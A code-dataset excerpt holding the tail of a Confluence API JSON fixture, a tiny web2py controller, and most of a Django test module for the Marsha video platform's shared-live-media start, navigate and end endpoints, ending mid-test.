"space": "/rest/api/space/SPACE"
}
},
{
"id": "148348824",
"type": "page",
"status": "current",
"title": "Forthic",
"extensions": {
"position": "none"
},
"_links": {
"webui": "/display/SPACE/Forthic",
"edit": "/pages/resumedraft.action?draftId=148348824",
"tinyui": "/x/mJ-XC",
"self": "https://testcontext/wiki/cf/rest/api/content/148348824"
},
"_expandable": {
"container": "/rest/api/space/SPACE",
"metadata": "",
"operations": "",
"children": "/rest/api/content/148348824/child",
"restrictions": "/rest/api/content/148348824/restriction/byOperation",
"history": "/rest/api/content/148348824/history",
"ancestors": "",
"body": "",
"version": "",
"descendants": "/rest/api/content/148348824/descendant",
"space": "/rest/api/space/SPACE"
}
},
{
"id": "248042769",
"type": "page",
"status": "current",
"title": "Forthic Framework",
"extensions": {
"position": "none"
},
"_links": {
"webui": "/display/SPACE/Forthic+Framework",
"edit": "/pages/resumedraft.action?draftId=248042769&draftShareId=e6dfb6e9-9a98-4e20-8afc-8fdfaa354ace",
"tinyui": "/x/EdXIDg",
"self": "https://testcontext/wiki/cf/rest/api/content/248042769"
},
"_expandable": {
"container": "/rest/api/space/SPACE",
"metadata": "",
"operations": "",
"children": "/rest/api/content/248042769/child",
"restrictions": "/rest/api/content/248042769/restriction/byOperation",
"history": "/rest/api/content/248042769/history",
"ancestors": "",
"body": "",
"version": "",
"descendants": "/rest/api/content/248042769/descendant",
"space": "/rest/api/space/SPACE"
}
},
{
"id": "261397943",
"type": "page",
"status": "current",
"title": "Forthic Testing",
"extensions": {
"position": "none"
},
"_links": {
"webui": "/display/SPACE/Forthic+Testing",
"edit": "/pages/resumedraft.action?draftId=261397943&draftShareId=5ebe725d-0d69-46a5-bf3f-5cd01d7c17c7",
"tinyui": "/x/t52UDw",
"self": "https://testcontext/wiki/cf/rest/api/content/261397943"
},
"_expandable": {
"container": "/rest/api/space/SPACE",
"metadata": "",
"operations": "",
"children": "/rest/api/content/261397943/child",
"restrictions": "/rest/api/content/261397943/restriction/byOperation",
"history": "/rest/api/content/261397943/history",
"ancestors": "",
"body": "",
"version": "",
"descendants": "/rest/api/content/261397943/descendant",
"space": "/rest/api/space/SPACE"
}
}
],
"container": {
"id": 119963668,
"key": "SPACE",
"name": "SPACE",
"type": "global",
"_links": {
"webui": "/display/SPACE",
"self": "https://testcontext/wiki/cf/rest/api/space/SPACE"
},
"_expandable": {
"metadata": "",
"icon": "",
"description": "",
"homepage": "/rest/api/content/119239646"
}
},
"body": {
"storage": {
"value": "<h2>This is second a test</h2>",
"representation": "storage",
"_expandable": {
"content": "/rest/api/content/388386405"
}
},
"_expandable": {
"editor": "",
"view": "",
"export_view": "",
"styled_view": "",
"anonymous_export_view": ""
}
},
"extensions": {
"position": "none"
},
"_links": {
"webui": "/display/SPACE/A+new+page+title",
"edit": "/pages/resumedraft.action?draftId=388386405",
"tinyui": "/x/ZU4mFw",
"collection": "/rest/api/content",
"base": "https://testcontext/wiki/cf",
"context": "/wiki/cf",
"self": "https://testcontext/wiki/cf/rest/api/content/388386405"
},
"_expandable": {
"metadata": "",
"operations": "",
"children": "/rest/api/content/388386405/child",
"restrictions": "/rest/api/content/388386405/restriction/byOperation",
"descendants": "/rest/api/content/388386405/descendant"
}
}
''' | 38.224605 | 134 | 0.430094 | 2,416 | 33,867 | 5.968543 | 0.090232 | 0.077184 | 0.112621 | 0.062552 | 0.930791 | 0.915395 | 0.892233 | 0.885853 | 0.877254 | 0.866019 | 0 | 0.090818 | 0.412821 | 33,867 | 886 | 135 | 38.224605 | 0.634316 | 0 | 0 | 0.725287 | 0 | 0.028736 | 0.94573 | 0.212716 | 0 | 0 | 0 | 0 | 0 | 1 | 0.008046 | false | 0 | 0.002299 | 0.001149 | 0.018391 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
24c6e5311426cf5f06971a03b1d9c08a06ae45d3 | 32 | py | Python | applications/init/controllers/files.py | xiejiafang/phone_report | ab86c66fcc1189fb2c78b7afad5d3a4a9c715e80 | [
"BSD-3-Clause"
] | 2 | 2018-04-27T08:44:38.000Z | 2021-11-24T05:58:42.000Z | applications/init/controllers/files.py | xiejiafang/phone_report | ab86c66fcc1189fb2c78b7afad5d3a4a9c715e80 | [
"BSD-3-Clause"
] | null | null | null | applications/init/controllers/files.py | xiejiafang/phone_report | ab86c66fcc1189fb2c78b7afad5d3a4a9c715e80 | [
"BSD-3-Clause"
] | 2 | 2018-06-28T03:14:39.000Z | 2019-05-06T16:26:24.000Z | def liuzhengxin(): return dict() | 32 | 32 | 0.75 | 4 | 32 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.09375 | 32 | 1 | 32 | 32 | 0.827586 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | true | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
24cd45b5cd41909413b58100cb86ed5a537d3b05 | 51,370 | py | Python | src/backend/marsha/core/tests/test_api_video_shared_live_media.py | insad-video/marsha | 1e6a708c74527f50c4aa24d811049492e75f47a0 | [
"MIT"
] | null | null | null | src/backend/marsha/core/tests/test_api_video_shared_live_media.py | insad-video/marsha | 1e6a708c74527f50c4aa24d811049492e75f47a0 | [
"MIT"
] | null | null | null | src/backend/marsha/core/tests/test_api_video_shared_live_media.py | insad-video/marsha | 1e6a708c74527f50c4aa24d811049492e75f47a0 | [
"MIT"
] | null | null | null | """Tests for the Video API for SharedLiveMedia navigation of the Marsha project."""
from datetime import datetime, timezone
import json
import random
from unittest import mock
from django.test import TestCase, override_settings
from rest_framework_simplejwt.tokens import AccessToken
from ..api.video import channel_layers_utils
from ..defaults import DELETED, ERROR, JITSI, PENDING, PROCESSING, READY, RUNNING
from ..factories import SharedLiveMediaFactory, UserFactory, VideoFactory
# pylint: disable=too-many-public-methods,too-many-lines
class TestVideoSharedLiveMedia(TestCase):
"""Tests for the Video API for SharedLiveMedia navigation of the Marsha project."""
maxDiff = None
def test_api_video_shared_live_media_start_anonymous(self):
"""An anonymous user can not start a shared live media."""
shared_live_media = SharedLiveMediaFactory()
response = self.client.patch(
f"/api/videos/{shared_live_media.video.id}/start-sharing/"
)
self.assertEqual(response.status_code, 401)
self.assertEqual(
response.json(), {"detail": "Authentication credentials were not provided."}
)
def test_api_video_shared_live_media_navigate_anonymous(self):
"""An anonymous user can not navigate in a shared live media."""
shared_live_media = SharedLiveMediaFactory()
response = self.client.patch(
f"/api/videos/{shared_live_media.video.id}/navigate-sharing/"
)
self.assertEqual(response.status_code, 401)
self.assertEqual(
response.json(), {"detail": "Authentication credentials were not provided."}
)
def test_api_video_shared_live_media_end_anonymous(self):
"""An anonymous user can not end a shared live media."""
shared_live_media = SharedLiveMediaFactory()
response = self.client.patch(
f"/api/videos/{shared_live_media.video.id}/end-sharing/"
)
self.assertEqual(response.status_code, 401)
self.assertEqual(
response.json(), {"detail": "Authentication credentials were not provided."}
)
def test_api_video_shared_live_media_start_student(self):
"""A student user can not start a shared live media."""
shared_live_media = SharedLiveMediaFactory()
jwt_token = AccessToken()
jwt_token.payload["resource_id"] = str(shared_live_media.video.id)
jwt_token.payload["context_id"] = str(shared_live_media.video.playlist.lti_id)
jwt_token.payload["consumer_site"] = str(
shared_live_media.video.playlist.consumer_site.id
)
jwt_token.payload["roles"] = ["student"]
jwt_token.payload["permissions"] = {"can_update": False}
response = self.client.patch(
f"/api/videos/{shared_live_media.video.id}/start-sharing/",
HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
)
self.assertEqual(response.status_code, 403)
self.assertEqual(
response.json(),
{"detail": "You do not have permission to perform this action."},
)
def test_api_video_shared_live_media_navigate_student(self):
"""A student user can not navigate in a shared live media."""
shared_live_media = SharedLiveMediaFactory()
jwt_token = AccessToken()
jwt_token.payload["resource_id"] = str(shared_live_media.video.id)
jwt_token.payload["roles"] = ["student"]
response = self.client.patch(
f"/api/videos/{shared_live_media.video.id}/navigate-sharing/",
HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
)
self.assertEqual(response.status_code, 403)
self.assertEqual(
response.json(),
{"detail": "You do not have permission to perform this action."},
)
def test_api_video_shared_live_media_end_student(self):
"""A student user can not end a shared live media."""
shared_live_media = SharedLiveMediaFactory()
jwt_token = AccessToken()
jwt_token.payload["resource_id"] = str(shared_live_media.video.id)
jwt_token.payload["roles"] = ["student"]
response = self.client.patch(
f"/api/videos/{shared_live_media.video.id}/end-sharing/",
HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
)
self.assertEqual(response.status_code, 403)
self.assertEqual(
response.json(),
{"detail": "You do not have permission to perform this action."},
)
def test_api_video_shared_live_media_start_staff_or_user(self):
"""Users authenticated via a session can not start a shared live media."""
shared_live_media = SharedLiveMediaFactory()
for user in [UserFactory(), UserFactory(is_staff=True)]:
self.client.login(username=user.username, password="test")
response = self.client.patch(
f"/api/videos/{shared_live_media.video.id}/start-sharing/"
)
self.assertEqual(response.status_code, 401)
self.assertEqual(
response.json(),
{"detail": "Authentication credentials were not provided."},
)
def test_api_video_shared_live_media_navigate_staff_or_user(self):
"""Users authenticated via a session can not navigate in a shared live media."""
shared_live_media = SharedLiveMediaFactory()
for user in [UserFactory(), UserFactory(is_staff=True)]:
self.client.login(username=user.username, password="test")
response = self.client.patch(
f"/api/videos/{shared_live_media.video.id}/navigate-sharing/"
)
self.assertEqual(response.status_code, 401)
self.assertEqual(
response.json(),
{"detail": "Authentication credentials were not provided."},
)
def test_api_video_shared_live_media_end_staff_or_user(self):
"""Users authenticated via a session can not end a shared live media."""
shared_live_media = SharedLiveMediaFactory()
for user in [UserFactory(), UserFactory(is_staff=True)]:
self.client.login(username=user.username, password="test")
response = self.client.patch(
f"/api/videos/{shared_live_media.video.id}/end-sharing/"
)
self.assertEqual(response.status_code, 401)
self.assertEqual(
response.json(),
{"detail": "Authentication credentials were not provided."},
)
@override_settings(LIVE_CHAT_ENABLED=True)
@override_settings(XMPP_BOSH_URL="https://xmpp-server.com/http-bind")
@override_settings(XMPP_CONFERENCE_DOMAIN="conference.xmpp-server.com")
@override_settings(XMPP_DOMAIN="conference.xmpp-server.com")
@override_settings(XMPP_JWT_SHARED_SECRET="xmpp_shared_secret")
def test_api_video_shared_live_media_start_instructor_ready(self):
"""An instructor can start a ready shared live media."""
video = VideoFactory(
playlist__title="foo bar",
playlist__lti_id="course-v1:ufr+mathematics+00001",
upload_state=PENDING,
live_state=RUNNING,
live_type=JITSI,
live_info={
"medialive": {
"input": {
"id": "medialive_input_1",
"endpoints": [
"https://live_endpoint1",
"https://live_endpoint2",
],
},
"channel": {"id": "medialive_channel_1"},
},
"mediapackage": {
"id": "mediapackage_channel_1",
"endpoints": {
"hls": {
"id": "endpoint1",
"url": "https://channel_endpoint1/live.m3u8",
},
},
},
},
)
shared_live_media = SharedLiveMediaFactory(
extension="pdf",
title="slides",
upload_state=READY,
uploaded_on=datetime(2021, 11, 30, tzinfo=timezone.utc),
nb_pages=3,
video=video,
)
jwt_token = AccessToken()
jwt_token.payload["resource_id"] = str(shared_live_media.video.id)
jwt_token.payload["roles"] = [random.choice(["instructor", "administrator"])]
jwt_token.payload["permissions"] = {"can_update": True}
jwt_token.payload["user"] = {"id": "56255f3807599c377bf0e5bf072359fd"}
with mock.patch.object(
channel_layers_utils, "dispatch_video_to_groups"
) as mock_dispatch_video_to_groups, mock.patch(
"marsha.core.serializers.xmpp_utils.generate_jwt"
) as mock_jwt_encode:
mock_jwt_encode.return_value = "xmpp_jwt"
response = self.client.patch(
f"/api/videos/{shared_live_media.video.id}/start-sharing/",
HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
data={"sharedlivemedia": str(shared_live_media.id)},
content_type="application/json",
)
video.refresh_from_db()
mock_dispatch_video_to_groups.assert_called_once_with(video)
self.assertEqual(response.status_code, 200)
content = response.json()
self.assertEqual(
content,
{
"active_shared_live_media": {
"active_stamp": "1638230400",
"filename": "slides.pdf",
"id": str(shared_live_media.id),
"is_ready_to_show": True,
"nb_pages": shared_live_media.nb_pages,
"show_download": True,
"title": "slides",
"upload_state": READY,
"urls": {
"pages": {
"1": (
"https://abc.cloudfront.net/"
f"{video.id}/sharedlivemedia/"
f"{shared_live_media.id}/1638230400_1.svg"
),
"2": (
"https://abc.cloudfront.net/"
f"{video.id}/sharedlivemedia/"
f"{shared_live_media.id}/1638230400_2.svg"
),
"3": (
"https://abc.cloudfront.net/"
f"{video.id}/sharedlivemedia/"
f"{shared_live_media.id}/1638230400_3.svg"
),
}
},
"video": str(video.id),
},
"active_shared_live_media_page": 1,
"allow_recording": True,
"description": shared_live_media.video.description,
"estimated_duration": None,
"has_chat": True,
"has_live_media": True,
"id": str(shared_live_media.video.id),
"title": shared_live_media.video.title,
"active_stamp": None,
"is_public": False,
"is_ready_to_show": True,
"is_recording": False,
"is_scheduled": False,
"join_mode": "approval",
"show_download": True,
"starting_at": None,
"upload_state": "pending",
"thumbnail": None,
"timed_text_tracks": [],
"urls": {
"manifests": {
"hls": "https://channel_endpoint1/live.m3u8",
},
"mp4": {},
"thumbnails": {},
},
"should_use_subtitle_as_transcript": False,
"has_transcript": False,
"participants_asking_to_join": [],
"participants_in_discussion": [],
"playlist": {
"id": str(shared_live_media.video.playlist.id),
"title": "foo bar",
"lti_id": "course-v1:ufr+mathematics+00001",
},
"recording_time": 0,
"shared_live_medias": [
{
"active_stamp": "1638230400",
"filename": "slides.pdf",
"id": str(shared_live_media.id),
"is_ready_to_show": True,
"nb_pages": shared_live_media.nb_pages,
"show_download": True,
"title": "slides",
"upload_state": READY,
"urls": {
"pages": {
"1": (
"https://abc.cloudfront.net/"
f"{video.id}/sharedlivemedia/"
f"{shared_live_media.id}/1638230400_1.svg"
),
"2": (
"https://abc.cloudfront.net/"
f"{video.id}/sharedlivemedia/"
f"{shared_live_media.id}/1638230400_2.svg"
),
"3": (
"https://abc.cloudfront.net/"
f"{video.id}/sharedlivemedia/"
f"{shared_live_media.id}/1638230400_3.svg"
),
}
},
"video": str(video.id),
},
],
"live_state": "running",
"live_info": {
"jitsi": {
"config_overwrite": {},
"domain": "meet.jit.si",
"external_api_url": "https://meet.jit.si/external_api.js",
"interface_config_overwrite": {},
"room_name": str(video.pk),
},
"medialive": {
"input": {
"endpoints": [
"https://live_endpoint1",
"https://live_endpoint2",
],
}
},
},
"live_type": JITSI,
"xmpp": {
"bosh_url": "https://xmpp-server.com/http-bind?token=xmpp_jwt",
"converse_persistent_store": "localStorage",
"websocket_url": None,
"conference_url": f"{video.id}@conference.xmpp-server.com",
"jid": "conference.xmpp-server.com",
},
},
)
self.assertEqual(video.active_shared_live_media, shared_live_media)
self.assertEqual(video.active_shared_live_media_page, 1)
@override_settings(LIVE_CHAT_ENABLED=True)
@override_settings(XMPP_BOSH_URL="https://xmpp-server.com/http-bind")
@override_settings(XMPP_CONFERENCE_DOMAIN="conference.xmpp-server.com")
@override_settings(XMPP_DOMAIN="conference.xmpp-server.com")
@override_settings(XMPP_JWT_SHARED_SECRET="xmpp_shared_secret")
def test_api_video_shared_live_media_start_not_ready(self):
"""An instructor can not start a not ready shared live media."""
video = VideoFactory(
playlist__title="foo bar",
playlist__lti_id="course-v1:ufr+mathematics+00001",
upload_state=PENDING,
live_state=RUNNING,
live_type=JITSI,
live_info={
"medialive": {
"input": {
"id": "medialive_input_1",
"endpoints": [
"https://live_endpoint1",
"https://live_endpoint2",
],
},
"channel": {"id": "medialive_channel_1"},
},
"mediapackage": {
"id": "mediapackage_channel_1",
"endpoints": {
"hls": {
"id": "endpoint1",
"url": "https://channel_endpoint1/live.m3u8",
},
},
},
},
)
for state in [
PENDING,
PROCESSING,
ERROR,
DELETED,
]:
shared_live_media = SharedLiveMediaFactory(
extension="pdf",
title="slides",
# upload_state=random.choice([s[0] for s in STATE_CHOICES if s[0] != READY]),
upload_state=state,
uploaded_on=datetime(2021, 11, 30, tzinfo=timezone.utc),
nb_pages=3,
video=video,
)
jwt_token = AccessToken()
jwt_token.payload["resource_id"] = str(shared_live_media.video.id)
jwt_token.payload["roles"] = [
random.choice(["instructor", "administrator"])
]
jwt_token.payload["permissions"] = {"can_update": True}
jwt_token.payload["user"] = {"id": "56255f3807599c377bf0e5bf072359fd"}
with mock.patch.object(
channel_layers_utils, "dispatch_video_to_groups"
) as mock_dispatch_video_to_groups:
response = self.client.patch(
f"/api/videos/{video.id}/start-sharing/",
HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
data={"sharedlivemedia": str(shared_live_media.id)},
content_type="application/json",
)
mock_dispatch_video_to_groups.assert_not_called()
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(), {"detail": "Shared live media is not ready."}
)
def test_api_video_shared_live_media_start_wrong_video_id(self):
"""An instructor can not start a shared live media
if related video doesn't match the JWT ressource."""
shared_live_media = SharedLiveMediaFactory()
other_shared_live_media = SharedLiveMediaFactory()
jwt_token = AccessToken()
jwt_token.payload["resource_id"] = str(other_shared_live_media.video.id)
jwt_token.payload["roles"] = [random.choice(["instructor", "administrator"])]
jwt_token.payload["permissions"] = {"can_update": True}
response = self.client.patch(
f"/api/videos/{shared_live_media.video.id}/start-sharing/",
HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
data={"sharedlivemedia": str(shared_live_media.id)},
content_type="application/json",
)
self.assertEqual(response.status_code, 403)
self.assertEqual(
response.json(),
{"detail": "You do not have permission to perform this action."},
)
@override_settings(LIVE_CHAT_ENABLED=True)
@override_settings(XMPP_BOSH_URL="https://xmpp-server.com/http-bind")
@override_settings(XMPP_CONFERENCE_DOMAIN="conference.xmpp-server.com")
@override_settings(XMPP_DOMAIN="conference.xmpp-server.com")
@override_settings(XMPP_JWT_SHARED_SECRET="xmpp_shared_secret")
def test_api_video_shared_live_media_start_wrong_sharedlivemedia_id(self):
"""An instructor can not start a shared live media if the video is not related."""
shared_live_media = SharedLiveMediaFactory()
other_shared_live_media = SharedLiveMediaFactory(upload_state=READY)
jwt_token = AccessToken()
jwt_token.payload["resource_id"] = str(shared_live_media.video.id)
jwt_token.payload["roles"] = [random.choice(["instructor", "administrator"])]
jwt_token.payload["permissions"] = {"can_update": True}
jwt_token.payload["user"] = {"id": "56255f3807599c377bf0e5bf072359fd"}
with mock.patch.object(
channel_layers_utils, "dispatch_video_to_groups"
) as mock_dispatch_video_to_groups:
response = self.client.patch(
f"/api/videos/{shared_live_media.video.id}/start-sharing/",
HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
data={"sharedlivemedia": str(other_shared_live_media.id)},
content_type="application/json",
)
mock_dispatch_video_to_groups.assert_not_called()
self.assertEqual(response.status_code, 404)
@override_settings(LIVE_CHAT_ENABLED=True)
@override_settings(XMPP_BOSH_URL="https://xmpp-server.com/http-bind")
@override_settings(XMPP_CONFERENCE_DOMAIN="conference.xmpp-server.com")
@override_settings(XMPP_DOMAIN="conference.xmpp-server.com")
@override_settings(XMPP_JWT_SHARED_SECRET="xmpp_shared_secret")
def test_api_video_shared_live_media_start_already_started(self):
"""An instructor can not start a shared live media
if related video shared live media has started."""
video = VideoFactory(
playlist__title="foo bar",
playlist__lti_id="course-v1:ufr+mathematics+00001",
active_shared_live_media=SharedLiveMediaFactory(),
upload_state=PENDING,
live_state=RUNNING,
live_type=JITSI,
live_info={
"medialive": {
"input": {
"id": "medialive_input_1",
"endpoints": [
"https://live_endpoint1",
"https://live_endpoint2",
],
},
"channel": {"id": "medialive_channel_1"},
},
"mediapackage": {
"id": "mediapackage_channel_1",
"endpoints": {
"hls": {
"id": "endpoint1",
"url": "https://channel_endpoint1/live.m3u8",
},
},
},
},
)
shared_live_media = SharedLiveMediaFactory(video=video)
jwt_token = AccessToken()
jwt_token.payload["resource_id"] = str(shared_live_media.video.id)
jwt_token.payload["roles"] = [random.choice(["instructor", "administrator"])]
jwt_token.payload["permissions"] = {"can_update": True}
jwt_token.payload["user"] = {"id": "56255f3807599c377bf0e5bf072359fd"}
with mock.patch.object(
channel_layers_utils, "dispatch_video_to_groups"
) as mock_dispatch_video_to_groups:
response = self.client.patch(
f"/api/videos/{shared_live_media.video.id}/start-sharing/",
HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
data={"sharedlivemedia": str(shared_live_media.id)},
content_type="application/json",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(response.json(), {"detail": "Video is already sharing."})
mock_dispatch_video_to_groups.assert_not_called()
@override_settings(LIVE_CHAT_ENABLED=True)
@override_settings(XMPP_BOSH_URL="https://xmpp-server.com/http-bind")
@override_settings(XMPP_CONFERENCE_DOMAIN="conference.xmpp-server.com")
@override_settings(XMPP_DOMAIN="conference.xmpp-server.com")
@override_settings(XMPP_JWT_SHARED_SECRET="xmpp_shared_secret")
def test_api_video_shared_live_media_navigate_instructor(self):
"""An instructor can navigate in a shared live media."""
shared_live_media = SharedLiveMediaFactory(nb_pages=6)
video = VideoFactory(
playlist__title="foo bar",
playlist__lti_id="course-v1:ufr+mathematics+00001",
active_shared_live_media=shared_live_media,
active_shared_live_media_page=1,
upload_state=PENDING,
live_state=RUNNING,
live_type=JITSI,
live_info={
"medialive": {
"input": {
"id": "medialive_input_1",
"endpoints": [
"https://live_endpoint1",
"https://live_endpoint2",
],
},
"channel": {"id": "medialive_channel_1"},
},
"mediapackage": {
"id": "mediapackage_channel_1",
"endpoints": {
"hls": {
"id": "endpoint1",
"url": "https://channel_endpoint1/live.m3u8",
},
},
},
},
)
video.shared_live_medias.set([shared_live_media])
jwt_token = AccessToken()
jwt_token.payload["resource_id"] = str(shared_live_media.video.id)
jwt_token.payload["roles"] = [random.choice(["instructor", "administrator"])]
jwt_token.payload["permissions"] = {"can_update": True}
jwt_token.payload["user"] = {"id": "56255f3807599c377bf0e5bf072359fd"}
with mock.patch.object(
channel_layers_utils, "dispatch_video_to_groups"
) as mock_dispatch_video_to_groups, mock.patch(
"marsha.core.serializers.xmpp_utils.generate_jwt"
) as mock_jwt_encode:
mock_jwt_encode.return_value = "xmpp_jwt"
response = self.client.patch(
f"/api/videos/{shared_live_media.video.id}/navigate-sharing/",
HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
data={"target_page": 2},
content_type="application/json",
)
video.refresh_from_db()
mock_dispatch_video_to_groups.assert_called_once_with(video)
self.assertEqual(response.status_code, 200)
content = json.loads(response.content)
self.assertEqual(
{
"active_shared_live_media": {
"active_stamp": None,
"filename": None,
"id": str(shared_live_media.id),
"is_ready_to_show": False,
"nb_pages": shared_live_media.nb_pages,
"show_download": True,
"title": None,
"upload_state": "pending",
"urls": None,
"video": str(video.id),
},
"active_shared_live_media_page": 2,
"allow_recording": True,
"description": shared_live_media.video.description,
"estimated_duration": None,
"has_chat": True,
"has_live_media": True,
"id": str(shared_live_media.video.id),
"title": shared_live_media.video.title,
"active_stamp": None,
"is_public": False,
"is_ready_to_show": True,
"is_recording": False,
"is_scheduled": False,
"join_mode": "approval",
"show_download": True,
"starting_at": None,
"upload_state": "pending",
"thumbnail": None,
"timed_text_tracks": [],
"urls": {
"manifests": {
"hls": "https://channel_endpoint1/live.m3u8",
},
"mp4": {},
"thumbnails": {},
},
"should_use_subtitle_as_transcript": False,
"has_transcript": False,
"participants_asking_to_join": [],
"participants_in_discussion": [],
"playlist": {
"id": str(shared_live_media.video.playlist.id),
"title": "foo bar",
"lti_id": "course-v1:ufr+mathematics+00001",
},
"recording_time": 0,
"shared_live_medias": [
{
"active_stamp": None,
"filename": None,
"id": str(shared_live_media.id),
"is_ready_to_show": False,
"nb_pages": shared_live_media.nb_pages,
"show_download": True,
"title": None,
"upload_state": "pending",
"urls": None,
"video": str(video.id),
}
],
"live_state": "running",
"live_info": {
"jitsi": {
"config_overwrite": {},
"domain": "meet.jit.si",
"external_api_url": "https://meet.jit.si/external_api.js",
"interface_config_overwrite": {},
"room_name": str(video.pk),
},
"medialive": {
"input": {
"endpoints": [
"https://live_endpoint1",
"https://live_endpoint2",
],
}
},
},
"live_type": JITSI,
"xmpp": {
"bosh_url": "https://xmpp-server.com/http-bind?token=xmpp_jwt",
"converse_persistent_store": "localStorage",
"websocket_url": None,
"conference_url": f"{video.id}@conference.xmpp-server.com",
"jid": "conference.xmpp-server.com",
},
},
content,
)
self.assertEqual(video.active_shared_live_media, shared_live_media)
self.assertEqual(video.active_shared_live_media_page, 2)
def test_api_video_shared_live_media_navigate_no_active(self):
"""An instructor can not navigate if no active shared live media."""
shared_live_media = SharedLiveMediaFactory(nb_pages=2)
video = VideoFactory(
playlist__title="foo bar",
playlist__lti_id="course-v1:ufr+mathematics+00001",
upload_state=PENDING,
live_state=RUNNING,
live_type=JITSI,
live_info={
"medialive": {
"input": {
"id": "medialive_input_1",
"endpoints": [
"https://live_endpoint1",
"https://live_endpoint2",
],
},
"channel": {"id": "medialive_channel_1"},
},
"mediapackage": {
"id": "mediapackage_channel_1",
"endpoints": {
"hls": {
"id": "endpoint1",
"url": "https://channel_endpoint1/live.m3u8",
},
},
},
},
)
video.shared_live_medias.set([shared_live_media])
jwt_token = AccessToken()
jwt_token.payload["resource_id"] = str(video.id)
jwt_token.payload["roles"] = [random.choice(["instructor", "administrator"])]
jwt_token.payload["permissions"] = {"can_update": True}
jwt_token.payload["user"] = {"id": "56255f3807599c377bf0e5bf072359fd"}
with mock.patch.object(
channel_layers_utils, "dispatch_video_to_groups"
) as mock_dispatch_video_to_groups:
response = self.client.patch(
f"/api/videos/{video.id}/navigate-sharing/",
HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
data={"target_page": 2},
content_type="application/json",
)
video.refresh_from_db()
mock_dispatch_video_to_groups.assert_not_called()
self.assertEqual(response.status_code, 400)
self.assertEqual(response.json(), {"detail": "No shared live media."})
self.assertEqual(video.active_shared_live_media, None)
self.assertEqual(video.active_shared_live_media_page, None)
@override_settings(LIVE_CHAT_ENABLED=True)
@override_settings(XMPP_BOSH_URL="https://xmpp-server.com/http-bind")
@override_settings(XMPP_CONFERENCE_DOMAIN="conference.xmpp-server.com")
@override_settings(XMPP_DOMAIN="conference.xmpp-server.com")
@override_settings(XMPP_JWT_SHARED_SECRET="xmpp_shared_secret")
def test_api_video_shared_live_media_navigate_unexisting_page(self):
"""An instructor can not navigate to an unexisting page in a shared live media."""
shared_live_media = SharedLiveMediaFactory(nb_pages=6)
video = VideoFactory(
playlist__title="foo bar",
playlist__lti_id="course-v1:ufr+mathematics+00001",
active_shared_live_media=shared_live_media,
active_shared_live_media_page=1,
upload_state=PENDING,
live_state=RUNNING,
live_type=JITSI,
live_info={
"medialive": {
"input": {
"id": "medialive_input_1",
"endpoints": [
"https://live_endpoint1",
"https://live_endpoint2",
],
},
"channel": {"id": "medialive_channel_1"},
},
"mediapackage": {
"id": "mediapackage_channel_1",
"endpoints": {
"hls": {
"id": "endpoint1",
"url": "https://channel_endpoint1/live.m3u8",
},
},
},
},
)
video.shared_live_medias.set([shared_live_media])
jwt_token = AccessToken()
jwt_token.payload["resource_id"] = str(shared_live_media.video.id)
jwt_token.payload["roles"] = [random.choice(["instructor", "administrator"])]
jwt_token.payload["permissions"] = {"can_update": True}
jwt_token.payload["user"] = {"id": "56255f3807599c377bf0e5bf072359fd"}
with mock.patch.object(
channel_layers_utils, "dispatch_video_to_groups"
) as mock_dispatch_video_to_groups:
response = self.client.patch(
f"/api/videos/{shared_live_media.video.id}/navigate-sharing/",
HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
data={"target_page": 7},
content_type="application/json",
)
video.refresh_from_db()
mock_dispatch_video_to_groups.assert_not_called()
self.assertEqual(response.status_code, 400)
self.assertEqual(response.json(), {"detail": "Page does not exist."})
self.assertEqual(video.active_shared_live_media, shared_live_media)
self.assertEqual(video.active_shared_live_media_page, 1)
@override_settings(LIVE_CHAT_ENABLED=True)
@override_settings(XMPP_BOSH_URL="https://xmpp-server.com/http-bind")
@override_settings(XMPP_CONFERENCE_DOMAIN="conference.xmpp-server.com")
@override_settings(XMPP_DOMAIN="conference.xmpp-server.com")
@override_settings(XMPP_JWT_SHARED_SECRET="xmpp_shared_secret")
def test_api_video_shared_live_media_navigate_undefined_page(self):
"""An instructor can not navigate to an undefined page in a shared live media."""
shared_live_media = SharedLiveMediaFactory(nb_pages=6)
video = VideoFactory(
playlist__title="foo bar",
playlist__lti_id="course-v1:ufr+mathematics+00001",
active_shared_live_media=shared_live_media,
active_shared_live_media_page=1,
upload_state=PENDING,
live_state=RUNNING,
live_type=JITSI,
live_info={
"medialive": {
"input": {
"id": "medialive_input_1",
"endpoints": [
"https://live_endpoint1",
"https://live_endpoint2",
],
},
"channel": {"id": "medialive_channel_1"},
},
"mediapackage": {
"id": "mediapackage_channel_1",
"endpoints": {
"hls": {
"id": "endpoint1",
"url": "https://channel_endpoint1/live.m3u8",
},
},
},
},
)
video.shared_live_medias.set([shared_live_media])
jwt_token = AccessToken()
jwt_token.payload["resource_id"] = str(shared_live_media.video.id)
jwt_token.payload["roles"] = [random.choice(["instructor", "administrator"])]
jwt_token.payload["permissions"] = {"can_update": True}
jwt_token.payload["user"] = {"id": "56255f3807599c377bf0e5bf072359fd"}
with mock.patch.object(
channel_layers_utils, "dispatch_video_to_groups"
